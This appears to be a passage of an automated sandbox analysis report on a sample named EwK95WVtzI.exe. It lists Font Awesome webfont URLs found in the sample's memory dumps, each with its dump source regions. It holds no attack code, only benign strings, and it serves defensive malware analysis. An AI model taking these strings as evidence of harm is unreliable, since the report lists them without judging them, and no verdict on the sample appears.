                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot?#iefix
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.svg#fontawesome
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.ttf
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot?#iefix
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.svg#fontawesome
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.ttf
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff2
